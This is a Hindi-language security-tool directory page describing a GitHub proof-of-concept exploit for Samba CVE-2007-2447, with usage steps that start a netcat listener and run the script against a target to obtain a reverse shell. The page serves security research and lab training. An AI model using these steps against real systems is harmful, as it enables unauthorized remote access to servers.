Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2007-2447 — Samba usermap स्क्रिप्ट रिमोट कमांड निष्पादन (CVE-2007-2447) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, नियंत्रित प्रयोगशाला परीक्षण और सुरक्षा अनुसंधान के लिए रिवर्स शेल क्षमता के साथ। | Kitploit
उपकरण/GitHubGitHub/abdulsaabir/cve-2007-2447
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Samba usermap स्क्रिप्ट रिमोट कमांड निष्पादन (CVE-2007-2447) के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, नियंत्रित प्रयोगशाला परीक्षण और सुरक्षा अनुसंधान के लिए रिवर्स शेल क्षमता के साथ।

रिपॉजिटरी देखें
128 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2007-2447

PoC: Samba "usermap script" दूरस्थ कमांड-निष्पादन (ऐतिहासिक CVE). इस रिपॉजिटरी में एक छोटा प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है जो अनुसंधान और शैक्षिक समीक्षा के लिए है। प्राथमिक स्क्रिप्ट usermap_script_Command_Execution.py है।

संदर्भ लेख: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

उपयोग

रिपॉजिटरी को क्लोन करें और स्क्रिप्ट को एक नियंत्रित प्रयोगशाला में चलाएं। PoC वैकल्पिक रूप से LHOST:LPORT पर एक रिवर्स शेल भेजता है — स्क्रिप्ट चलाने से पहले अपना लिसनर शुरू करें और सुनिश्चित करें कि निर्भरताएँ स्थापित हैं (स्थापना अनुभाग देखें)।

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

पैरामीटर

  • RHOST — लक्ष्य IP या होस्टनाम
  • RPORT — लक्ष्य TCP पोर्ट (आमतौर पर 139)
  • LHOST — रिवर्स कनेक्शन के लिए लिसनर IP
  • LPORT — लिसनर पोर्ट
  • स्थापना

    अनुशंसित: स्क्रिप्ट चलाने से पहले एक पृथक Python वर्चुअल वातावरण बनाएं और requirements.txt से निर्भरताएँ स्थापित करें।

    root@kitploit:~
    python3 -m venv exploit_env
    source exploit_env/bin/activate
    pip install -r requirements.txt
    

    सुरक्षा और अस्वीकरण

    यह कोड केवल वैध सुरक्षा अनुसंधान, शिक्षा और रक्षात्मक परीक्षण के लिए प्रदान किया गया है। इस स्क्रिप्ट को किसी भी ऐसे सिस्टम के विरुद्ध न चलाएं जिसके आप मालिक नहीं हैं या जिसके लिए आपके पास स्पष्ट लिखित अनुमति नहीं है। दुरुपयोग कानूनी परिणामों का कारण बन सकता है; रिपॉजिटरी स्वामी दुरुपयोग के लिए उत्तरदायी नहीं है।

    संभावित खतरनाक कोड का विश्लेषण करते समय हमेशा स्थैतिक कोड समीक्षा और नियंत्रित प्रयोगशाला परीक्षण (VM स्नैपशॉट, पृथक नेटवर्क और पैकेट कैप्चर) को प्राथमिकता दें।

    यदि आप एक निष्पादन योग्य नहीं, बल्कि एनोटेटेड वॉकथ्रू या requirements.txt चाहते हैं, तो यहाँ एक issue खोलें या इसका अनुरोध करें।

    टूल डाउनलोड करें